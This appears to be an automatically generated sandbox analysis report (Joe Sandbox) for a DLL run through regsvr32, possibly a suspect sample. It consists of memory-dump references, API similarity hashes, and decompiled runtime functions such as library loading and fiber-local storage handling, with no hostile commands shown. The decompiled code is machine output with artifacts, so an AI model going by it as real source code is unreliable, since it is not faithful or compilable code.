                                                                                                        0x7ffc2890903e
                                                                                                        0x7ffc28909043
                                                                                                        0x7ffc28909045
                                                                                                        0x7ffc2890904a
                                                                                                        0x7ffc2890904e
                                                                                                        0x7ffc28909056
                                                                                                        0x7ffc28909060
                                                                                                        0x7ffc28909065
                                                                                                        0x7ffc28909067
                                                                                                        0x7ffc2890906d
                                                                                                        0x7ffc28909072
                                                                                                        0x7ffc28909077
                                                                                                        0x7ffc2890907d
                                                                                                        0x7ffc28909082
                                                                                                        0x7ffc28909087
                                                                                                        0x7ffc2890908d
                                                                                                        0x7ffc28909093
                                                                                                        0x7ffc28909097
                                                                                                        0x7ffc2890909e
                                                                                                        0x7ffc289090a3
                                                                                                        0x7ffc289090c2

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                        • String ID: -$0$f$p$p
                                                                                                        • API String ID: 3215553584-1865143739
                                                                                                        • Opcode ID: 3bf02160523cc795b8287601120242312cc0e9fc0a46e7f1dbb3d85bfcf254c4
                                                                                                        • Instruction ID: 0d3b675d1ba1e12fed773603dcef4e1e4a32ee2d267e71ae78975bacee0ee230
                                                                                                        • Opcode Fuzzy Hash: 3bf02160523cc795b8287601120242312cc0e9fc0a46e7f1dbb3d85bfcf254c4
                                                                                                        • Instruction Fuzzy Hash: DA12E462F0C16B85FB20BB14DC0427976A2FB90756F944137E68A57AC4DF3EE480CB68
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Object$LineMoveSelect$CreateDeletePolyline
                                                                                                        • String ID:
                                                                                                        • API String ID: 1917832262-0
                                                                                                        • Opcode ID: 43512701d7355e0956f5cb1433a41ae321c0b5e41867a7adc5de44204bc134c7
                                                                                                        • Instruction ID: 5d1ece9620996831e33e4cd9d2d68a97c1157ef0649579c94c2bc2d13ed8250f
                                                                                                        • Opcode Fuzzy Hash: 43512701d7355e0956f5cb1433a41ae321c0b5e41867a7adc5de44204bc134c7
                                                                                                        • Instruction Fuzzy Hash: E2911A76608B448ADB65DB28E45132AF7A4F7C9784F144226DACE93BA8DF3CD449CF00
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 77%
                                                                                                        			E00007FFC7FFC2890D8F0(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                                                                                        				void* _t37;
                                                                                                        				signed long long _t57;
                                                                                                        				intOrPtr _t61;
                                                                                                        				signed long long _t72;
                                                                                                        				void* _t75;
                                                                                                        				signed long long _t76;
                                                                                                        				long long _t82;
                                                                                                        				void* _t86;
                                                                                                        				signed long long _t90;
                                                                                                        				signed long long _t91;
                                                                                                        				WCHAR* _t93;
                                                                                                        				long _t96;
                                                                                                        				void* _t99;
                                                                                                        				WCHAR* _t104;
                                                                                                        
                                                                                                        				 *((long long*)(_t86 + 8)) = __rbx;
                                                                                                        				 *((long long*)(_t86 + 0x10)) = _t82;
                                                                                                        				 *((long long*)(_t86 + 0x18)) = __rsi;
                                                                                                        				r15d = __ecx;
                                                                                                        				_t90 =  *0x2897e008; // 0xf9c171536c9e
                                                                                                        				_t76 = _t75 | 0xffffffff;
                                                                                                        				_t72 = _t90 ^  *(0x7ffc28900000 + 0x7f840 + _t104 * 8);
                                                                                                        				asm("dec eax");
                                                                                                        				if (_t72 == _t76) goto 0x2890da36;
                                                                                                        				if (_t72 == 0) goto 0x2890d959;
                                                                                                        				_t57 = _t72;
                                                                                                        				goto 0x2890da38;
                                                                                                        				if (__r8 == __r9) goto 0x2890da1b;
                                                                                                        				_t61 =  *((intOrPtr*)(0x7ffc28900000 + 0x7f7a0 + __rsi * 8));
                                                                                                        				if (_t61 == 0) goto 0x2890d980;
                                                                                                        				if (_t61 != _t76) goto 0x2890da75;
                                                                                                        				goto 0x2890da07;
                                                                                                        				r8d = 0x800;
                                                                                                        				LoadLibraryExW(_t104, _t99, _t96);
                                                                                                        				if (_t57 != 0) goto 0x2890da55;
                                                                                                        				if (GetLastError() != 0x57) goto 0x2890d9f5;
                                                                                                        				_t14 = _t57 - 0x50; // -80
                                                                                                        				_t37 = _t14;
                                                                                                        				r8d = _t37;
                                                                                                        				if (E00007FFC7FFC2890F5B0(_t90) == 0) goto 0x2890d9f5;
                                                                                                        				r8d = _t37;
                                                                                                        				if (E00007FFC7FFC2890F5B0(_t90) == 0) goto 0x2890d9f5;
                                                                                                        				r8d = 0;
                                                                                                        				LoadLibraryExW(_t93, _t75);
                                                                                                        				if (_t57 != 0) goto 0x2890da55;
                                                                                                        				 *((intOrPtr*)(0x7ffc28900000 + 0x7f7a0 + __rsi * 8)) = _t76;
                                                                                                        				if (__r8 + 4 != __r9) goto 0x2890d962;
                                                                                                        				_t91 =  *0x2897e008; // 0xf9c171536c9e
                                                                                                        				asm("dec eax");
                                                                                                        				 *(0x7ffc28900000 + 0x7f840 + _t104 * 8) = _t76 ^ _t91;
                                                                                                        				return 0;
                                                                                                        			}

















                                                                                                        0x7ffc2890d8f0
                                                                                                        0x7ffc2890d8f5
                                                                                                        0x7ffc2890d8fa
                                                                                                        0x7ffc2890d90c
                                                                                                        0x7ffc2890d927
                                                                                                        0x7ffc2890d92e
                                                                                                        0x7ffc2890d938
                                                                                                        0x7ffc2890d940
                                                                                                        0x7ffc2890d946
                                                                                                        0x7ffc2890d94f
                                                                                                        0x7ffc2890d951
                                                                                                        0x7ffc2890d954
                                                                                                        0x7ffc2890d95c
                                                                                                        0x7ffc2890d965
                                                                                                        0x7ffc2890d970
                                                                                                        0x7ffc2890d975
                                                                                                        0x7ffc2890d97b
                                                                                                        0x7ffc2890d98d
                                                                                                        0x7ffc2890d993
                                                                                                        0x7ffc2890d99f
                                                                                                        0x7ffc2890d9ae
                                                                                                        0x7ffc2890d9b0
                                                                                                        0x7ffc2890d9b0
                                                                                                        0x7ffc2890d9b6
                                                                                                        0x7ffc2890d9c7
                                                                                                        0x7ffc2890d9c9
                                                                                                        0x7ffc2890d9dd
                                                                                                        0x7ffc2890d9df
                                                                                                        0x7ffc2890d9e7
                                                                                                        0x7ffc2890d9f3
                                                                                                        0x7ffc2890d9ff
                                                                                                        0x7ffc2890da0e
                                                                                                        0x7ffc2890da14
                                                                                                        0x7ffc2890da28
                                                                                                        0x7ffc2890da2e
                                                                                                        0x7ffc2890da54

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressFreeLibraryProc
                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                        • API String ID: 3013587201-537541572
                                                                                                        • Opcode ID: 0c6698adf364fca3294d1cea9b6c9e04e4170ebc5fe981ec924076e30e6001fe
                                                                                                        • Instruction ID: 00eb5800da5ac4f0538c1216b43e097d1600fad717b34d04f124d1d9750cdff2
                                                                                                        • Opcode Fuzzy Hash: 0c6698adf364fca3294d1cea9b6c9e04e4170ebc5fe981ec924076e30e6001fe
                                                                                                        • Instruction Fuzzy Hash: 1741E422B1DA2645FA11AB1A9C042762295FF05BE1F094237DD1D4B7C4DE3EF444C328
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$ErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 2506987500-0
                                                                                                        • Opcode ID: eec7dff64ec5c52d9157cbd157dfbab6f6a7a87af12ff6c832096e5b6ec65f04
                                                                                                        • Instruction ID: 554682969e2ccaf9dbffe6e4ef682eeaddcec5afa46308f37c8cee9209b0ae82
                                                                                                        • Opcode Fuzzy Hash: eec7dff64ec5c52d9157cbd157dfbab6f6a7a87af12ff6c832096e5b6ec65f04
                                                                                                        • Instruction Fuzzy Hash: B8218020F0C67E81FA6877655D4123D6182EF84BB6F044736E97E476C6EE2EB441C228
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                        • String ID: CONOUT$
                                                                                                        • API String ID: 3230265001-3130406586
                                                                                                        • Opcode ID: f8beb9e43c57309afe536eff65cc898a76b098485244b241a9a6a9293252ff3c
                                                                                                        • Instruction ID: 8c76a116569a73e22166dcfbdd636c4825e9d0e77c3adc6af0dab368573e8200
                                                                                                        • Opcode Fuzzy Hash: f8beb9e43c57309afe536eff65cc898a76b098485244b241a9a6a9293252ff3c
                                                                                                        • Instruction Fuzzy Hash: B411D621718A6586E790AB56FC4432963A4FB48FE6F040235DE1D877D4DF3CD404C758
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FFC2890B429,?,?,?,?,00007FFC28910426,?,?,00000000,00007FFC2890D8B7,?,?,?), ref: 00007FFC2890BA5B
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC2890B429,?,?,?,?,00007FFC28910426,?,?,00000000,00007FFC2890D8B7,?,?,?), ref: 00007FFC2890BA91
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC2890B429,?,?,?,?,00007FFC28910426,?,?,00000000,00007FFC2890D8B7,?,?,?), ref: 00007FFC2890BABE
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC2890B429,?,?,?,?,00007FFC28910426,?,?,00000000,00007FFC2890D8B7,?,?,?), ref: 00007FFC2890BACF
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC2890B429,?,?,?,?,00007FFC28910426,?,?,00000000,00007FFC2890D8B7,?,?,?), ref: 00007FFC2890BAE0
                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FFC2890B429,?,?,?,?,00007FFC28910426,?,?,00000000,00007FFC2890D8B7,?,?,?), ref: 00007FFC2890BAFB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$ErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 2506987500-0
                                                                                                        • Opcode ID: 2fa0da27fe614c465e9bfeef243b6df5757a5299518a3d762b3cf139a2d538dd
                                                                                                        • Instruction ID: 20bc7123af88d637f15b6a829fe22d153606ad1217fb020fcfaad3ed1d585c75
                                                                                                        • Opcode Fuzzy Hash: 2fa0da27fe614c465e9bfeef243b6df5757a5299518a3d762b3cf139a2d538dd
                                                                                                        • Instruction Fuzzy Hash: ED116020B0C66E81FA547775AD512392282EF84BB2F044737E93E476D6EE6EF441C228
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                        • Opcode ID: b9ddca252de5587d32854ed20271dee5b9467b0203a57a46f89d53908150ef97
                                                                                                        • Instruction ID: b9c70b80620d1c65749d0311d6757b30bf03211a05b1de74d21c2d31a6e14974
                                                                                                        • Opcode Fuzzy Hash: b9ddca252de5587d32854ed20271dee5b9467b0203a57a46f89d53908150ef97
                                                                                                        • Instruction Fuzzy Hash: 09F06261B1872A85EB10AB64EC5437A6360FF897A3F580237DA6E452F4CF3DD449C328
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 85%
                                                                                                        			E00007FFC7FFC2890EB68(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                                                                                                        				signed int _t27;
                                                                                                        				signed int _t28;
                                                                                                        				signed int _t29;
                                                                                                        				signed int _t30;
                                                                                                        				signed int _t31;
                                                                                                        				signed int _t42;
                                                                                                        				signed int _t43;
                                                                                                        				signed int _t44;
                                                                                                        				signed int _t46;
                                                                                                        				void* _t51;
                                                                                                        
                                                                                                        				_a8 = __rbx;
                                                                                                        				_a16 = __rsi;
                                                                                                        				_t27 = __ecx & 0x0000001f;
                                                                                                        				if ((__ecx & 0x00000008) == 0) goto 0x2890eb9a;
                                                                                                        				if (sil >= 0) goto 0x2890eb9a;
                                                                                                        				E00007FFC7FFC28911CEC(_t27, _t51);
                                                                                                        				_t28 = _t27 & 0xfffffff7;
                                                                                                        				goto 0x2890ebf1;
                                                                                                        				_t42 = 0x00000004 & dil;
                                                                                                        				if (_t42 == 0) goto 0x2890ebb5;
                                                                                                        				asm("dec eax");
                                                                                                        				if (_t42 >= 0) goto 0x2890ebb5;
                                                                                                        				E00007FFC7FFC28911CEC(_t28, _t51);
                                                                                                        				_t29 = _t28 & 0xfffffffb;
                                                                                                        				goto 0x2890ebf1;
                                                                                                        				_t43 = dil & 0x00000001;
                                                                                                        				if (_t43 == 0) goto 0x2890ebd1;
                                                                                                        				asm("dec eax");
                                                                                                        				if (_t43 >= 0) goto 0x2890ebd1;
                                                                                                        				E00007FFC7FFC28911CEC(_t29, _t51);
                                                                                                        				_t30 = _t29 & 0xfffffffe;
                                                                                                        				goto 0x2890ebf1;
                                                                                                        				_t44 = dil & 0x00000002;
                                                                                                        				if (_t44 == 0) goto 0x2890ebf1;
                                                                                                        				asm("dec eax");
                                                                                                        				if (_t44 >= 0) goto 0x2890ebf1;
                                                                                                        				if ((dil & 0x00000010) == 0) goto 0x2890ebee;
                                                                                                        				E00007FFC7FFC28911CEC(_t30, _t51);
                                                                                                        				_t31 = _t30 & 0xfffffffd;
                                                                                                        				_t46 = dil & 0x00000010;
                                                                                                        				if (_t46 == 0) goto 0x2890ec0b;
                                                                                                        				asm("dec eax");
                                                                                                        				if (_t46 >= 0) goto 0x2890ec0b;
                                                                                                        				E00007FFC7FFC28911CEC(_t31, _t51);
                                                                                                        				return 0 | (_t31 & 0xffffffef) == 0x00000000;
                                                                                                        			}













                                                                                                        0x7ffc2890eb68
                                                                                                        0x7ffc2890eb6d
                                                                                                        0x7ffc2890eb7c
                                                                                                        0x7ffc2890eb84
                                                                                                        0x7ffc2890eb89
                                                                                                        0x7ffc2890eb90
                                                                                                        0x7ffc2890eb95
                                                                                                        0x7ffc2890eb98
                                                                                                        0x7ffc2890eb9f
                                                                                                        0x7ffc2890eba2
                                                                                                        0x7ffc2890eba4
                                                                                                        0x7ffc2890eba9
                                                                                                        0x7ffc2890ebab
                                                                                                        0x7ffc2890ebb0
                                                                                                        0x7ffc2890ebb3
                                                                                                        0x7ffc2890ebb5
                                                                                                        0x7ffc2890ebb9
                                                                                                        0x7ffc2890ebbb
                                                                                                        0x7ffc2890ebc0
                                                                                                        0x7ffc2890ebc7
                                                                                                        0x7ffc2890ebcc
                                                                                                        0x7ffc2890ebcf
                                                                                                        0x7ffc2890ebd1
                                                                                                        0x7ffc2890ebd5
                                                                                                        0x7ffc2890ebd7
                                                                                                        0x7ffc2890ebdc
                                                                                                        0x7ffc2890ebe2
                                                                                                        0x7ffc2890ebe9
                                                                                                        0x7ffc2890ebee
                                                                                                        0x7ffc2890ebf1
                                                                                                        0x7ffc2890ebf5
                                                                                                        0x7ffc2890ebf7
                                                                                                        0x7ffc2890ebfc
                                                                                                        0x7ffc2890ec03
                                                                                                        0x7ffc2890ec21

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _set_statfp
                                                                                                        • String ID:
                                                                                                        • API String ID: 1156100317-0
                                                                                                        • Opcode ID: fc2f76716917edeea79f2d35986c40ea1bb698eb9e2e32f596387757052cb74d
                                                                                                        • Instruction ID: 1445e606d2c0fd607c2525782d57d36761c59b967c4f24674c253649ff6d70cd
                                                                                                        • Opcode Fuzzy Hash: fc2f76716917edeea79f2d35986c40ea1bb698eb9e2e32f596387757052cb74d
                                                                                                        • Instruction Fuzzy Hash: 6C110136E2EA3B41F264312EED5233C1548EF98372F040632F92F862D6CE2DA841C12C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FFC28909403,?,?,00000000,00007FFC2890969E,?,?,?,?,?,00007FFC2890962A), ref: 00007FFC2890BB33
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC28909403,?,?,00000000,00007FFC2890969E,?,?,?,?,?,00007FFC2890962A), ref: 00007FFC2890BB52
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC28909403,?,?,00000000,00007FFC2890969E,?,?,?,?,?,00007FFC2890962A), ref: 00007FFC2890BB7A
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC28909403,?,?,00000000,00007FFC2890969E,?,?,?,?,?,00007FFC2890962A), ref: 00007FFC2890BB8B
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC28909403,?,?,00000000,00007FFC2890969E,?,?,?,?,?,00007FFC2890962A), ref: 00007FFC2890BB9C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value
                                                                                                        • String ID:
                                                                                                        • API String ID: 3702945584-0
                                                                                                        • Opcode ID: 8052eee4b0d8af64d03de27b504a711c4d5b3c24d31682e890b399a3a393ee09
                                                                                                        • Instruction ID: 13d59755088597647b892ef13b54a92cfc48a73dc32ca996cddd6d62c0bb1b78
                                                                                                        • Opcode Fuzzy Hash: 8052eee4b0d8af64d03de27b504a711c4d5b3c24d31682e890b399a3a393ee09
                                                                                                        • Instruction Fuzzy Hash: 6D113D60E0C66E42FA5877256D526795142EF84BB2F044736E83E866DAEE2EF441C228
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value
                                                                                                        • String ID:
                                                                                                        • API String ID: 3702945584-0
                                                                                                        • Opcode ID: 42504d049ca0b81dd607a4491970e33291414fa471f24a262c13f0c89c120e85
                                                                                                        • Instruction ID: ef1233d8c14868633e059c44111b7cab5c12a29d9e8146eeca787c174dd6621d
                                                                                                        • Opcode Fuzzy Hash: 42504d049ca0b81dd607a4491970e33291414fa471f24a262c13f0c89c120e85
                                                                                                        • Instruction Fuzzy Hash: FC11F750E0C62F42FD68B2755C522791182DF84B76F184B37E93E4A2D2EE2EB441D23C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 49%
                                                                                                        			E00007FFC7FFC28910958(void* __ecx, signed int __edx, void* __esi, void* __ebp, void* __esp, long long __rbx, intOrPtr* __rcx, long long __r8) {
                                                                                                        				void* __rdi;
                                                                                                        				void* __rsi;
                                                                                                        				void* __rbp;
                                                                                                        				intOrPtr _t181;
                                                                                                        				signed int _t186;
                                                                                                        				signed int _t193;
                                                                                                        				signed int _t198;
                                                                                                        				void* _t212;
                                                                                                        				signed char _t213;
                                                                                                        				void* _t263;
                                                                                                        				signed long long _t264;
                                                                                                        				signed long long _t267;
                                                                                                        				long long _t269;
                                                                                                        				signed long long _t271;
                                                                                                        				long long _t276;
                                                                                                        				long long _t278;
                                                                                                        				long long _t280;
                                                                                                        				intOrPtr* _t289;
                                                                                                        				intOrPtr _t294;
                                                                                                        				long long _t295;
                                                                                                        				long long _t318;
                                                                                                        				void* _t326;
                                                                                                        				long long _t327;
                                                                                                        				void* _t328;
                                                                                                        				long long _t329;
                                                                                                        				long long _t331;
                                                                                                        				signed char* _t332;
                                                                                                        				signed char* _t333;
                                                                                                        				signed char* _t334;
                                                                                                        				intOrPtr* _t335;
                                                                                                        				void* _t336;
                                                                                                        				void* _t337;
                                                                                                        				signed long long _t338;
                                                                                                        				intOrPtr _t341;
                                                                                                        				signed long long _t343;
